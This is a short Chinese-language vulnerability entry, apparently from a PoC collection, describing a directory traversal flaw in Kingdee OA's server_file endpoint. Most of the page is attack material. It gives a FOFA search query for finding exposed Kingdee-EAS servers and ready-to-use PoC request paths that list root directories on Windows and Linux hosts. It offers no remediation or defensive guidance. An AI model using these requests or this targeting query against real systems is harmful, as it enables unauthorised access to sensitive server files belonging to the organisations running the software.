金蝶OA_server_file_目录遍历漏洞

# 金蝶OA server_file 目录遍历漏洞

## 漏洞描述

金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息

## 漏洞影响

> 金蝶OA

## FOFA

> app=”Kingdee-EAS”

## 漏洞复现

登录界面为

![](/static/qingy/金蝶OA_server_file_目录遍历漏洞/img/1.png)

漏洞POC

“`
Windows服务器

appmonitor/protected/selector/server_file/files?folder=C://&suffix=

Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=
“`

![2](/static/qingy/金蝶OA_server_file_目录遍历漏洞/img/20.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容